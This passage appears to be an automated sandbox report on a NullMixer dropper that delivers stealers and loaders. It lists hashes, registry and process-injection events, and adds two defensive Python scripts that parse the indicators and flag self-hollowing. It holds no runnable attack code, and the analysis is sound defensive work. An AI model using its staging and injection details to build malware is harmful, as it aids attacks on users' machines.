SHA256 8d87208c69dfaec03d8b25f5d2e4ff08754b8fb676c9f34d22f5c8aa44042d9a
SHA512 769b6f87b181d8f686f14c89010dad4cd290498b7c07370cc504cbd4d78ac99b210d0a03692d1a4ae34b9dfe9c327a7aa67efa83b4cba3d16f8144e64e44add3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e83012540abcd938de2da7ef1da8d985
SHA1 96fd96c65d686a98ebf082fdbc90fcf4c07f76b2
SHA256 2d452541d2a315488e4dc2b553e9e80363d6778cc07f69d0f75332b268588140
SHA512 9193b60c760909fdba1282639d5eff359385e550d8abafeb7dab70cec518b52927a8a50d92db2964faaec3aa5de7e7d4f9620f072d19350afaa0c52ee5cdd602

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 dd223163fa3ebccc5610ea93947ad07e
SHA1 7e577c939ab7d9cbb668a5fe464f1bb5a55c074b
SHA256 f5d6fe3bb10aa29fa69b794541341946c9b8342534b71d11eadf31eb653ddc63
SHA512 0f7ea3559382dae58f87b3d15891b92b6440aa60f326599849e67ad2ce6575223d4fa2546b4e76f7551128684f3b2ef0eb5f73b7a9effd8d47dece0968d396c2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 65a002f257e550bda8895516946ddd3a
SHA1 ebbf9082d730f16ed33a1f0d68d2eaf733534b66
SHA256 42c1da2556b85ed27f0435120bebc40bfe6c36a0e723600022a13323f1881fc1
SHA512 1198c97b18156b52d23f9700ba5849f5a197f184eacf5a533fa4a0c50bf4eb63f7104ac74cc9340ff5168d56c56d2004e6b8af527f71b0ad4ce3fd9436a0533c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 14270fa89e6407dc80b57dac503ad67d
SHA1 eebd61b2d36ff8770279836e85682c7d207114fb
SHA256 4cc22f0f210613c9ef22718b348845852a972440f9bbd30ca133fc542c0b49a5
SHA512 9025700b2712d8e6e657432f4794433f1f6763e322e70460566a2a370c4ac67835e0f7465c2e549bc59a73171b3d8e42bb41e90d428a58e3555433cfa7059501

memory/2800-1395-0x00000000003E0000-0x0000000000400000-memory.dmp
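Two things about the Files list above are easy to misread. First, the same path appears several times with different digests (setup_install.exe five times, libstdc++-6.dll twice): that is what a file being rewritten in place during extraction looks like, so every digest is a valid hash IOC and a hunt has to use all of them. Second, the memory/<pid>-<n>-0x<start>-0x<end>-memory.dmp entries are dumped memory regions with no hashes; the region at 0x140000000 in PID 2800 sits at the default image base of a 64-bit PE. The block below is an added example, not code from the sandbox: it parses the list into per-name hash sets, validates each digest, and decodes the dump regions. SAMPLE is a subset of the entries above; the x64 image-base check is this example's own heuristic.

```python
"""Collect dropped-file hashes and memory-dump regions from a sandbox Files
list.  Added example, not sandbox code.  SAMPLE is a subset of the entries
above; the x64 default image base check is this example's own heuristic."""
import re
from collections import defaultdict

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
DUMP = re.compile(r"^memory/(\d+)-\d+-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
X64_IMAGE_BASE = 0x140000000   # default ImageBase the MSVC linker assigns to 64-bit EXEs

# Entries copied from the Files list above.
SAMPLE = r"""
\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe

MD5 6c58494fe6c5b1165373ba8a9e2e7599
SHA1 63ec4cf742bddb40a357c33cc4f856cd42ad272c
SHA256 6ad0b50d4c8a38ef40a256a5fa70c77c67227938edbae6a0a796f7caf5533dab
SHA512 0722c387a674bd2afc1a365d9067f34c35ab2f4f8849d8b0dce68eb9dd38d9bcc4dc9402de5e1b61ebab8ed7cbc95a05cd31e2b2b1e62aeb691645ac14a7ba43

C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe

MD5 913c1f0b3bda02bb59081cabb00100cc
SHA1 e54d696837a705e5375eb01a88b96247f54a18ed
SHA256 30c4283a9d09c12f10df209499658e296ec6ecec00b53eb2856d6fcc02ac1af3
SHA512 b9c6ac42b28f73bb9569512efb9cd9ace8f3cddd45b9a53532a5bf7e589a4ef61e2d854274772f1958c2319e2c25da0ff3bd992b780e2bbc32bbc172e2cff6cb

memory/2476-33-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1164-146-0x000000013F070000-0x000000013F080000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS6FA4.tmp\Install.cmd

MD5 a3c236c7c80bbcad8a4efe06a5253731
SHA1 f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07
SHA256 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d
SHA512 dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc

memory/2800-1040-0x0000000140000000-0x0000000140786000-memory.dmp
"""


def parse_files(text):
    """Each entry is a path line followed by zero or more '<ALGO> <hex>' lines."""
    entries, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        algo, _, digest = line.partition(" ")
        if algo in HASH_LEN and cur is not None:
            cur["hashes"][algo] = digest.strip().lower()
        else:
            cur = {"path": line, "hashes": {}}
            entries.append(cur)
    return entries


def validate(entries):
    """Return (path, algo, digest) for every digest that is not hex of the right length."""
    bad = []
    for e in entries:
        for algo, digest in e["hashes"].items():
            if len(digest) != HASH_LEN[algo] or not re.fullmatch(r"[0-9a-f]+", digest):
                bad.append((e["path"], algo, digest))
    return bad


def summarize(entries):
    by_name = defaultdict(set)          # basename -> every SHA256 recorded for it
    dumps = []
    for e in entries:
        m = DUMP.match(e["path"])
        if m:
            pid, start, end = int(m[1]), int(m[2], 16), int(m[3], 16)
            dumps.append({"pid": pid, "start": start, "size": end - start,
                          "x64_image_base": start == X64_IMAGE_BASE})
        elif "SHA256" in e["hashes"]:
            # Both '\Users\...' and 'C:\Users\...' forms occur; key on the file name.
            by_name[e["path"].rsplit("\\", 1)[-1].lower()].add(e["hashes"]["SHA256"])
    return {
        "by_name": {n: sorted(h) for n, h in by_name.items()},
        # Same name, several digests: rewritten during extraction, hunt on all of them.
        "rewritten": sorted(n for n, h in by_name.items() if len(h) > 1),
        "all_sha256": sorted(set().union(*by_name.values())) if by_name else [],
        "dumps": dumps,
    }


if __name__ == "__main__":
    ents = parse_files(SAMPLE)
    print("malformed:", validate(ents))
    for key, value in summarize(ents).items():
        print(f"{key}: {value}")
```

The all_sha256 list is the hash block list to feed an EDR; the rewritten list says which names need more than one entry; the dump list gives the (pid, base, size) triples to pull first when carving unpacked payloads from the sandbox's memory dumps.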

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-07 10:02

Reported

2024-01-07 10:06

Platform

win10v2004-20231215-en

Max time kernel

85s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe"

Signatures

NullMixer

dropper nullmixer

PrivateLoader

loader privateloader

RisePro

stealer risepro

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0035b9e6fdaf9.exe N/A
Note: a RunOnce value named wextract_cleanup0 that calls advpack.dll,DelNodeRunDLL32 is the self-cleanup entry written by the Windows IExpress/WExtract self-extractor; at the next logon it deletes the IXP000.TMP extraction directory rather than launching anything. It marks 0035b9e6fdaf9.exe as a WExtract-packaged stage (the process that spawns IXP000.TMP\1cr.exe in the WriteProcessMemory table below), not as the payload's own persistence mechanism.

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe N/A
N/A N/A N/A N/A (this row is repeated 62 times in the report: further process-enumeration events with no indicator or process recorded)

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\81edfb0db828.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\27e380c23ad33.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
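The MapViewOfSection, SeDebugPrivilege and WriteProcessMemory entries in this section are the sandbox's view of one activity: a process writing into another. Most of the writes in the WriteProcessMemory table that follows are the loader populating children it has just created (the parent of each new PID writes into it during CreateProcess), which is why the table doubles as a process tree. The one pair that stands out is 731da7284717.exe (PID 2472) writing into a second 731da7284717.exe (PID 4968): a process spawning a copy of its own image and writing into it is the shape of a self-hollowing (RunPE-style) loader. The block below is an added example, not the sandbox's code: it rebuilds the tree from rows of the form "PID X wrote to memory of Y N/A <writer image> <target image>", de-duplicates the repeated rows, and flags same-image writer/target pairs. SAMPLE is a subset of the rows in that table, repeats included.

```python
"""Rebuild the process tree from sandbox WriteProcessMemory rows.  Added
example, not sandbox code.  SAMPLE is a subset of the rows in this section,
repeats kept because the report logs each write separately."""
import re
from collections import defaultdict

ROW = re.compile(r"PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")

# Rows copied from the WriteProcessMemory table of this section.
SAMPLE = r"""
PID 4452 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe
PID 4452 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe
PID 4452 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe
PID 2024 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 5096 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\95714f41791.exe
PID 1436 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe
PID 1588 wrote to memory of 3876 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0035b9e6fdaf9.exe
PID 3876 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0035b9e6fdaf9.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2472 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe
PID 2472 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe
"""


def basename(path):
    return path.rsplit("\\", 1)[-1]


def build_tree(text):
    writes, image = defaultdict(int), {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        src, dst = int(m[1]), int(m[2])
        writes[(src, dst)] += 1                 # count repeats instead of keeping them
        image.setdefault(src, m[3])
        image.setdefault(dst, m[4])
    # A new child is written to by its parent during CreateProcess, so the first
    # writer seen for each PID is taken as its parent.
    parent, children = {}, defaultdict(list)
    for src, dst in writes:
        if dst not in parent:
            parent[dst] = src
            children[src].append(dst)
    roots = sorted(p for p in image if p not in parent)
    # Writer and target share an image name but not a PID: the process spawned a
    # copy of itself and wrote into it, the shape of a self-hollowing loader.
    hollowing = sorted((s, d, basename(image[s])) for s, d in writes
                       if s != d and basename(image[s]).lower() == basename(image[d]).lower())
    return {"writes": dict(writes), "image": image, "parent": parent,
            "children": dict(children), "roots": roots, "hollowing": hollowing}


def depth(tree, pid):
    """Number of parent hops from pid up to a root."""
    d = 0
    while pid in tree["parent"]:
        pid, d = tree["parent"][pid], d + 1
    return d


def render(tree, pid=None, indent=0):
    """Indented text tree, one '<pid> <image basename>' per line."""
    if pid is None:
        return "\n".join(render(tree, r) for r in tree["roots"])
    line = "  " * indent + f"{pid} {basename(tree['image'][pid])}"
    return "\n".join([line] + [render(tree, c, indent + 1) for c in tree["children"].get(pid, [])])


if __name__ == "__main__":
    t = build_tree(SAMPLE)
    print(render(t))
    for s, d, name in t["hollowing"]:
        print(f"hollowing candidate: {s} -> {d} ({name})")
```

The parent-is-first-writer rule is an approximation: it is right for the loader-populates-child writes that dominate sandbox logs, but a later injector writing into an already running process would not be reparented by it, and that is exactly the case the hollowing list is there to catch.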

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4452 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe
PID 4452 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe
PID 4452 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe
PID 2024 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 5096 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\95714f41791.exe
PID 2360 wrote to memory of 5096 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\95714f41791.exe
PID 1576 wrote to memory of 1288 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe
PID 1576 wrote to memory of 1288 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe
PID 1576 wrote to memory of 1288 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe
PID 1436 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe
PID 1436 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe
PID 1436 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe
PID 2896 wrote to memory of 4140 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe
PID 2896 wrote to memory of 4140 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe
PID 2896 wrote to memory of 4140 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe
PID 3712 wrote to memory of 4820 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\81edfb0db828.exe
PID 3712 wrote to memory of 4820 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\81edfb0db828.exe
PID 1192 wrote to memory of 2516 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\7da174d16d4.exe
PID 1192 wrote to memory of 2516 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\7da174d16d4.exe
PID 1192 wrote to memory of 2516 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\7da174d16d4.exe
PID 3068 wrote to memory of 1068 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\27e380c23ad33.exe
PID 3068 wrote to memory of 1068 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\27e380c23ad33.exe
PID 4592 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\cb3f07883441a5d6.exe
PID 4592 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\cb3f07883441a5d6.exe
PID 4592 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\cb3f07883441a5d6.exe
PID 1588 wrote to memory of 3876 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0035b9e6fdaf9.exe
PID 1588 wrote to memory of 3876 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0035b9e6fdaf9.exe
PID 3876 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0035b9e6fdaf9.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 3876 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0035b9e6fdaf9.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 3876 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0035b9e6fdaf9.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2472 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe
PID 2472 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe
PID 2472 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe
PID 1288 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe C:\Users\Admin\AppData\Local\Temp\chrome2.exe
PID 1288 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe C:\Users\Admin\AppData\Local\Temp\chrome2.exe
PID 1288 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1288 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
